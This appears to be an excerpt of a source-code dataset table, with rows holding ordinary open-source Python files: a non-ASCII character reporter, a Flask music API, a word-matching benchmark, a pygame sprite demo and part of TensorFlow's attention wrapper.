| repo_name (string, lengths 5-92) | path (string, lengths 4-221) | copies (string, 19 classes) | size (string, lengths 4-6) | content (string, lengths 766-896k) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 32-997) | alpha_frac (float64, 0.25-0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5-13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
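Each row below carries one source file together with the per-file statistics named in the header. As a minimal sketch (not part of the dataset itself), rows exported to a Parquet file could be filtered on those columns as follows; the file name `code_rows.parquet` and the thresholds are placeholders:

```python
import pandas as pd

# Load the exported rows (the path is an assumption for illustration).
df = pd.read_parquet("code_rows.parquet")

# Keep human-written, reasonably formatted source files:
#  - drop files flagged as autogenerated or as config/test files
#  - require some alphabetic content and a sane maximum line length
mask = (
    ~df["autogenerated"]
    & ~df["config_test"]
    & (df["alpha_frac"] >= 0.25)
    & (df["line_max"] <= 200)
)
filtered = df[mask]

print(f"kept {len(filtered)} of {len(df)} rows")
print(filtered[["repo_name", "path", "license"]].head())
```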
meisterluk/print-nonascii.py | printnonascii/char.py | 1 | 2308 | #!/usr/bin/env python3
class Character:
def __init__(self, c):
self.character = c
self.unicode_point = None
self.lineno = None
self.colno = None
self.category = None
self.description = None
self.line = None
def asciionly(self):
assert self.description or self.unicode_point
if self.description is not None and self.unicode_point is not None:
out = '{} {}'.format(self.unicode_point, self.description)
elif self.description:
out = '{}'.format(self.description)
elif self.unicode_point is not None:
out = '{}'.format(self.unicode_point)
if self.category is not None:
out += ' of category {}'.format(self.category)
if self.lineno is not None:
out += ' at line {}'.format(self.lineno)
elif self.colno is not None:
out += ' at column {}'.format(self.colno)
return out
@staticmethod
def make_pointer(line, colno):
out = ''
for idx in range(len(line)):
if idx == colno:
break
elif line[idx] == '\t':
out += '\t'
else:
out += '─'
return out + '⬏'
def __str__(self):
out = ''
if self.line is not None and self.colno is not None:
leading_ws = max(len(str(self.lineno)), 3)
tmpl = '{: <' + str(leading_ws) + 'd}: {}'
out += tmpl.format(self.lineno, self.line)
out += ' ' * leading_ws + ': '
out += self.make_pointer(self.line, self.colno)
out += '\n\n'
out += "{} ".format(self.character)
if self.unicode_point:
out += '{} '.format(self.unicode_point)
if self.lineno is not None and self.colno is not None:
out += '(line {}, col {})'.format(self.lineno, self.colno)
elif self.lineno is not None:
out += '(line {})'.format(self.lineno)
elif self.colno is not None:
out += '(col {})'.format(self.colno)
out += "\n"
if self.category:
out += " category: {}\n".format(self.category)
out += " name: {}\n".format(self.description)
out += "\n"
return out
| bsd-3-clause | -7,909,865,003,349,707,000 | 30.135135 | 75 | 0.503906 | false | 3.891892 | false | false | false |
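A minimal usage sketch for the `Character` class above; the import path follows the `path` column (`printnonascii/char.py`), and the character data filled in here is illustrative rather than produced by the tool's own scanner:

```python
from printnonascii.char import Character

# Describe one non-ASCII character found on a line of text.
c = Character("ï")
c.unicode_point = "U+00EF"
c.category = "Ll"
c.description = "LATIN SMALL LETTER I WITH DIAERESIS"
c.lineno = 1
c.colno = 2
c.line = "naïve approach"

print(c.asciionly())  # one-line ASCII-only summary
print(c)              # multi-line report with a pointer under the column
```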
building4theweb/soundem-api | soundem/views.py | 1 | 5875 | from flask import g, jsonify, request, abort
from flask_cors import cross_origin
from soundem import app
from .decorators import auth_token_required
from .models import Artist, Album, Song, User
@app.route('/api/v1/login', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def login():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
user = User.find_by_email(email)
if not user:
errors['email'] = 'User does not exist.'
elif not user.check_password(password):
errors['password'] = 'Invalid password.'
if errors:
return jsonify({'errors': errors}), 400
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data})
@app.route('/api/v1/register', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def register():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
existing_user = User.find_by_email(email)
if existing_user:
errors['email'] = 'Email is already taken'
if errors:
return jsonify({'errors': errors}), 400
user = User.create(email=email, password=password)
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data}), 201
@app.route('/api/v1/artists', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artists():
artists_results = []
for artist in Artist.get_all():
artists_results.append({
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
})
return jsonify({'artists': artists_results})
@app.route('/api/v1/artists/<int:artist_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artist(artist_id):
artist = Artist.get(artist_id)
if not artist:
abort(404)
artist_data = {
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
}
return jsonify({'artist': artist_data})
@app.route('/api/v1/albums', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_albums():
albums_results = []
for album in Album.get_all():
albums_results.append({
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
})
return jsonify({'albums': albums_results})
@app.route('/api/v1/albums/<int:album_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_album(album_id):
album = Album.get(album_id)
if not album:
abort(404)
album_data = {
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
}
return jsonify({'album': album_data})
@app.route('/api/v1/songs', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_songs():
songs_results = []
favorite = request.args.get('favorite')
song_ids = request.args.getlist('ids[]')
if favorite == 'true':
songs = Song.get_favorites(g.user)
elif song_ids:
songs = Song.filter_by_ids(song_ids)
else:
songs = Song.get_all()
for song in songs:
songs_results.append({
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': song.is_favorited(g.user),
'duration': song.duration,
'url': song.url
})
return jsonify({'songs': songs_results})
@app.route('/api/v1/songs/<int:song_id>', methods=['GET', 'PUT'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def song(song_id):
song = Song.get(song_id)
is_favorited = None
if not song:
abort(404)
if request.method == 'PUT':
data = request.get_json() or {}
data_song = data.get('song') or {}
favorite = data_song.get('favorite')
if favorite is not None:
# Update song if favorite param was sent
is_favorited = song.set_favorite(g.user, favorite)
else:
song = Song.get(song_id)
if is_favorited is None:
# Check if song was favorited
is_favorited = song.is_favorited(g.user)
song_data = {
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': is_favorited,
'duration': song.duration,
'url': song.url
}
return jsonify({'song': song_data})
@app.route('/api/v1/users/<int:user_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def user(user_id):
user = g.user
if user.id != user_id:
abort(403)
user_data = {
'id': user.id,
'email': user.email,
'songTotal': Song.total_count(),
'albumTotal': Album.total_count(),
'durationTotal': Song.total_duration()
}
return jsonify({'user': user_data})
| mit | 6,891,862,848,539,757,000 | 24.323276 | 65 | 0.584 | false | 3.459953 | false | false | false |
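A sketch of how a client might exercise the endpoints defined above, using the `requests` library; the base URL is a placeholder for a local development server, and the `Authorization` header format is an assumption, since the `auth_token_required` decorator is not shown in this file:

```python
import requests

BASE = "http://localhost:5000/api/v1"  # assumed dev server address

# Register a user, then reuse the returned token on authenticated requests.
resp = requests.post(BASE + "/register",
                     json={"email": "user@example.com", "password": "secret"})
token = resp.json()["user"]["token"]
headers = {"Authorization": "Bearer " + token}  # header scheme assumed

# List albums and mark the first song of the first album as a favorite.
albums = requests.get(BASE + "/albums", headers=headers).json()["albums"]
first_song_id = albums[0]["songs"][0]
requests.put(BASE + "/songs/%d" % first_song_id,
             json={"song": {"favorite": True}},
             headers=headers)
```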
notkarol/banjin | experiment/python_word_matching_speed.py | 1 | 4650 | #!/usr/bin/python
# Takes in a dictionary of words
# Verifies that all functions return the same answers
# Generates random hands from the probability of getting tiles from the bunch
# Then prints out how long each function takes to find all matching words
# Generates various hand sizes to see if there's any scaling
import matplotlib.pyplot as plt
import numpy as np
import pickle
import os
import sys
import timeit
# Naive list way of matching wordbank
def f0_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i][i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if min(list(map(lambda x: x[1] - x[0], zip(wordbank[w_i], hand)))) >= 0:
results.append(w_i)
return results
# Naive way using numpy
def f0_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i,i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if not np.any((hand - wordbank[w_i]) < 0):
results.append(w_i)
return results
# A for loop and some numpy
def f2_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if np.min(hand - wordbank[w_i]) >= 0:
results.append(w_i)
return results
# Vectorized sum and difference
def f3_np(hand, wordbank):
return np.where(np.sum((wordbank - hand) > 0, axis=1) == 0)[0]
# vectorized just using any
def f4_np(hand, wordbank):
return np.where(np.any(wordbank > hand, axis=1) == 0)[0]
# Prepare a 2D list and a 2D np array of letter frequencies
with open(sys.argv[1]) as f:
words = [x.split()[0] for x in f.readlines()]
wordbank_list = [[0] * 26 for _ in range(len(words))]
wordbank_np = np.zeros((len(words), 26))
for w_i in range(len(words)):
for letter in sorted(words[w_i]):
pos = ord(letter) - 65
wordbank_list[w_i][pos] += 1
wordbank_np[w_i][pos] += 1
# Arrays for keeping track of functions and data-specific wordbanks
hand_sizes = list(range(2, 9))
functions = {'list' : [f0_list, f1_list],
'numpy': [f0_np, f1_np, f2_np, f3_np, f4_np]}
wordbanks = {'list' : wordbank_list,
'numpy': wordbank_np}
n_iter = 10 if len(sys.argv) < 3 else int(sys.argv[2])
timings = {}
for datatype in functions:
timings[datatype] = np.zeros((max(hand_sizes) + 1, n_iter, len(functions[datatype])))
# Verify that our functions give the same answers
for datatype in functions:
for func in functions[datatype]:
print(datatype, func(wordbanks[datatype][len(wordbank_list) // 2], wordbanks[datatype]))
# Time each function on random hands at each hand size
imports = 'from __main__ import functions, wordbanks'
for counter in range(n_iter):
for hand_size in hand_sizes:
# Get a specific hand size
hand = [13,3,3,6,18,3,4,3,12,2,2,5,3,8,11,3,2,9,6,9,6,3,3,2,3,2]
while sum(hand) > hand_size:
pos = np.random.randint(sum(hand))
for i in range(len(hand)):
pos -= hand[i]
if pos < 0:
hand[i] -= 1
break
hand = str(hand)
# For this hand go wild
for datatype in functions:
for f_i in range(len(functions[datatype])):
cmd = 'functions["%s"][%i](%s, wordbanks["%s"])' % (datatype, f_i, hand, datatype)
timings[datatype][hand_size, counter, f_i] += timeit.timeit(cmd, imports, number=8)
print("\rCompleted %.1f%%" % (100 * (counter + 1) / n_iter), end='')
print()
# Save words and timings in case we're doing a long-lasting operation
filename = 'word_matching_timings_%s.pkl' % os.path.basename(sys.argv[1])
with open(filename, 'wb') as f:
print("Saving", filename)
pickle.dump((words, wordbanks, timings), f)
# Show Results
for datatype in functions:
means = np.mean(timings[datatype], axis=1)
for f_i in range(means.shape[1]):
plt.semilogy(hand_sizes, means[:, f_i][min(hand_sizes):], label='%s F%i' % (datatype, f_i))
plt.legend(loc='center left', bbox_to_anchor=(0.85, 0.5))
plt.xlabel("Hand Size")
plt.ylabel("Execution Time")
plt.title("Word Matching")
plt.show()
| mit | 6,223,729,968,353,600,000 | 29.794702 | 99 | 0.60043 | false | 3.144016 | false | false | false |
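The benchmark above encodes every hand and word as a length-26 vector of letter counts. A small self-contained check of the fully vectorized matcher `f4_np` (copied from the script; the three-word bank is made up for the example):

```python
import numpy as np

def f4_np(hand, wordbank):
    # A word matches when the hand has at least as many of every letter.
    return np.where(np.any(wordbank > hand, axis=1) == 0)[0]

def counts(word):
    vec = np.zeros(26)
    for letter in word:
        vec[ord(letter) - 65] += 1
    return vec

words = ["CAB", "BEE", "ACE"]            # illustrative word bank
wordbank = np.array([counts(w) for w in words])
hand = counts("ABCE")                    # letters available in the hand

print([words[i] for i in f4_np(hand, wordbank)])  # prints ['CAB', 'ACE']
```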
asweigart/pyganim | examples/sprite_sheet_demo.py | 1 | 1276 | # trex image from Wyverii on http://opengameart.org/content/unsealed-terrex
import sys
import os
sys.path.append(os.path.abspath('..'))
import pygame
from pygame.locals import *
import pyganim
pygame.init()
# set up the window
windowSurface = pygame.display.set_mode((320, 240), 0, 32)
pygame.display.set_caption('Sprite Sheet Demo')
# create the animation objects
rects = [( 0, 154, 94, 77),
( 94, 154, 94, 77),
(188, 154, 94, 77),
(282, 154, 94, 77),
(376, 154, 94, 77),
(470, 154, 94, 77),
(564, 154, 94, 77),
(658, 154, 94, 77),
(752, 154, 94, 77),]
allImages = pyganim.getImagesFromSpriteSheet('terrex_0.png', rects=rects)
frames = list(zip(allImages, [100] * len(allImages)))
dinoAnim = pyganim.PygAnimation(frames)
dinoAnim.play() # there is also a pause() and stop() method
mainClock = pygame.time.Clock()
BGCOLOR = (100, 50, 50)
while True:
windowSurface.fill(BGCOLOR)
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
dinoAnim.blit(windowSurface, (100, 50))
pygame.display.update()
    mainClock.tick(30) # Feel free to experiment with any FPS setting.
| bsd-3-clause | -1,025,960,563,565,159,800 | 27.377778 | 83 | 0.633229 | false | 3.097087 | false | false | false |
Xeralux/tensorflow | tensorflow/contrib/seq2seq/python/ops/attention_wrapper.py | 1 | 59833 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A powerful dynamic attention wrapper object."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import math
import numpy as np
from tensorflow.contrib.framework.python.framework import tensor_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as layers_base
from tensorflow.python.layers import core as layers_core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.util import nest
__all__ = [
"AttentionMechanism",
"AttentionWrapper",
"AttentionWrapperState",
"LuongAttention",
"BahdanauAttention",
"hardmax",
"safe_cumprod",
"monotonic_attention",
"BahdanauMonotonicAttention",
"LuongMonotonicAttention",
]
_zero_state_tensors = rnn_cell_impl._zero_state_tensors # pylint: disable=protected-access
class AttentionMechanism(object):
@property
def alignments_size(self):
raise NotImplementedError
@property
def state_size(self):
raise NotImplementedError
def _prepare_memory(memory, memory_sequence_length, check_inner_dims_defined):
"""Convert to tensor and possibly mask `memory`.
Args:
memory: `Tensor`, shaped `[batch_size, max_time, ...]`.
memory_sequence_length: `int32` `Tensor`, shaped `[batch_size]`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
Returns:
A (possibly masked), checked, new `memory`.
Raises:
ValueError: If `check_inner_dims_defined` is `True` and not
`memory.shape[2:].is_fully_defined()`.
"""
memory = nest.map_structure(
lambda m: ops.convert_to_tensor(m, name="memory"), memory)
if memory_sequence_length is not None:
memory_sequence_length = ops.convert_to_tensor(
memory_sequence_length, name="memory_sequence_length")
if check_inner_dims_defined:
def _check_dims(m):
if not m.get_shape()[2:].is_fully_defined():
raise ValueError("Expected memory %s to have fully defined inner dims, "
"but saw shape: %s" % (m.name, m.get_shape()))
nest.map_structure(_check_dims, memory)
if memory_sequence_length is None:
seq_len_mask = None
else:
seq_len_mask = array_ops.sequence_mask(
memory_sequence_length,
maxlen=array_ops.shape(nest.flatten(memory)[0])[1],
dtype=nest.flatten(memory)[0].dtype)
seq_len_batch_size = (
memory_sequence_length.shape[0].value
or array_ops.shape(memory_sequence_length)[0])
def _maybe_mask(m, seq_len_mask):
rank = m.get_shape().ndims
rank = rank if rank is not None else array_ops.rank(m)
extra_ones = array_ops.ones(rank - 2, dtype=dtypes.int32)
m_batch_size = m.shape[0].value or array_ops.shape(m)[0]
if memory_sequence_length is not None:
message = ("memory_sequence_length and memory tensor batch sizes do not "
"match.")
with ops.control_dependencies([
check_ops.assert_equal(
seq_len_batch_size, m_batch_size, message=message)]):
seq_len_mask = array_ops.reshape(
seq_len_mask,
array_ops.concat((array_ops.shape(seq_len_mask), extra_ones), 0))
return m * seq_len_mask
else:
return m
return nest.map_structure(lambda m: _maybe_mask(m, seq_len_mask), memory)
def _maybe_mask_score(score, memory_sequence_length, score_mask_value):
if memory_sequence_length is None:
return score
  message = ("All values in memory_sequence_length must be greater than zero.")
with ops.control_dependencies(
[check_ops.assert_positive(memory_sequence_length, message=message)]):
score_mask = array_ops.sequence_mask(
memory_sequence_length, maxlen=array_ops.shape(score)[1])
score_mask_values = score_mask_value * array_ops.ones_like(score)
return array_ops.where(score_mask, score, score_mask_values)
class _BaseAttentionMechanism(AttentionMechanism):
"""A base AttentionMechanism class providing common functionality.
Common functionality includes:
1. Storing the query and memory layers.
2. Preprocessing and storing the memory.
"""
def __init__(self,
query_layer,
memory,
probability_fn,
memory_sequence_length=None,
memory_layer=None,
check_inner_dims_defined=True,
score_mask_value=None,
name=None):
"""Construct base AttentionMechanism class.
Args:
query_layer: Callable. Instance of `tf.layers.Layer`. The layer's depth
must match the depth of `memory_layer`. If `query_layer` is not
provided, the shape of `query` must match that of `memory_layer`.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
probability_fn: A `callable`. Converts the score and previous alignments
to probabilities. Its signature should be:
`probabilities = probability_fn(score, state)`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
memory_layer: Instance of `tf.layers.Layer` (may be None). The layer's
depth must match the depth of `query_layer`.
If `memory_layer` is not provided, the shape of `memory` must match
that of `query_layer`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
name: Name to use when creating ops.
"""
if (query_layer is not None
and not isinstance(query_layer, layers_base.Layer)):
raise TypeError(
"query_layer is not a Layer: %s" % type(query_layer).__name__)
if (memory_layer is not None
and not isinstance(memory_layer, layers_base.Layer)):
raise TypeError(
"memory_layer is not a Layer: %s" % type(memory_layer).__name__)
self._query_layer = query_layer
self._memory_layer = memory_layer
self.dtype = memory_layer.dtype
if not callable(probability_fn):
raise TypeError("probability_fn must be callable, saw type: %s" %
type(probability_fn).__name__)
if score_mask_value is None:
score_mask_value = dtypes.as_dtype(
self._memory_layer.dtype).as_numpy_dtype(-np.inf)
self._probability_fn = lambda score, prev: ( # pylint:disable=g-long-lambda
probability_fn(
_maybe_mask_score(score, memory_sequence_length, score_mask_value),
prev))
with ops.name_scope(
name, "BaseAttentionMechanismInit", nest.flatten(memory)):
self._values = _prepare_memory(
memory, memory_sequence_length,
check_inner_dims_defined=check_inner_dims_defined)
self._keys = (
self.memory_layer(self._values) if self.memory_layer # pylint: disable=not-callable
else self._values)
self._batch_size = (
self._keys.shape[0].value or array_ops.shape(self._keys)[0])
self._alignments_size = (self._keys.shape[1].value or
array_ops.shape(self._keys)[1])
@property
def memory_layer(self):
return self._memory_layer
@property
def query_layer(self):
return self._query_layer
@property
def values(self):
return self._values
@property
def keys(self):
return self._keys
@property
def batch_size(self):
return self._batch_size
@property
def alignments_size(self):
return self._alignments_size
@property
def state_size(self):
return self._alignments_size
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return a tensor of all zeros.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return _zero_state_tensors(max_time, batch_size, dtype)
def initial_state(self, batch_size, dtype):
"""Creates the initial state values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return the same output as initial_alignments.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A structure of all-zero tensors with shapes as described by `state_size`.
"""
return self.initial_alignments(batch_size, dtype)
def _luong_score(query, keys, scale):
"""Implements Luong-style (multiplicative) scoring function.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, call this function with `scale=True`.
Args:
query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
scale: Whether to apply a scale to the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
Raises:
ValueError: If `key` and `query` depths do not match.
"""
depth = query.get_shape()[-1]
key_units = keys.get_shape()[-1]
if depth != key_units:
raise ValueError(
"Incompatible or unknown inner dimensions between query and keys. "
"Query (%s) has units: %s. Keys (%s) have units: %s. "
"Perhaps you need to set num_units to the keys' dimension (%s)?"
% (query, depth, keys, key_units, key_units))
dtype = query.dtype
# Reshape from [batch_size, depth] to [batch_size, 1, depth]
# for matmul.
query = array_ops.expand_dims(query, 1)
# Inner product along the query units dimension.
# matmul shapes: query is [batch_size, 1, depth] and
# keys is [batch_size, max_time, depth].
# the inner product is asked to **transpose keys' inner shape** to get a
# batched matmul on:
# [batch_size, 1, depth] . [batch_size, depth, max_time]
# resulting in an output shape of:
# [batch_size, 1, max_time].
# we then squeeze out the center singleton dimension.
score = math_ops.matmul(query, keys, transpose_b=True)
score = array_ops.squeeze(score, [1])
if scale:
# Scalar used in weight scaling
g = variable_scope.get_variable(
"attention_g", dtype=dtype, initializer=1.)
score = g * score
return score
class LuongAttention(_BaseAttentionMechanism):
"""Implements Luong-style (multiplicative) attention scoring.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, construct the object with parameter
`scale=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="LuongAttention"):
"""Construct the AttentionMechanism mechanism.
Args:
num_units: The depth of the attention mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length: (optional) Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional) The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the memory layer of the attention mechanism.
name: Name to use when creating ops.
"""
# For LuongAttention, we only transform the memory layer; thus
# num_units **must** match expected the query depth.
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(LuongAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_attention", [query]):
score = _luong_score(query, self._keys, self._scale)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
def _bahdanau_score(processed_query, keys, normalize):
"""Implements Bahdanau-style (additive) scoring function.
  This attention has two forms. The first is Bahdanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, set `normalize=True`.
Args:
processed_query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
normalize: Whether to normalize the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
"""
dtype = processed_query.dtype
# Get the number of hidden units from the trailing dimension of keys
num_units = keys.shape[2].value or array_ops.shape(keys)[2]
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
processed_query = array_ops.expand_dims(processed_query, 1)
v = variable_scope.get_variable(
"attention_v", [num_units], dtype=dtype)
if normalize:
# Scalar used in weight normalization
g = variable_scope.get_variable(
"attention_g", dtype=dtype,
initializer=math.sqrt((1. / num_units)))
# Bias added prior to the nonlinearity
b = variable_scope.get_variable(
"attention_b", [num_units], dtype=dtype,
initializer=init_ops.zeros_initializer())
# normed_v = g * v / ||v||
normed_v = g * v * math_ops.rsqrt(
math_ops.reduce_sum(math_ops.square(v)))
return math_ops.reduce_sum(
normed_v * math_ops.tanh(keys + processed_query + b), [2])
else:
return math_ops.reduce_sum(v * math_ops.tanh(keys + processed_query), [2])
class BahdanauAttention(_BaseAttentionMechanism):
"""Implements Bahdanau-style (additive) attention.
This attention has two forms. The first is Bahdanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, construct the object with parameter
`normalize=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="BahdanauAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(BahdanauAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
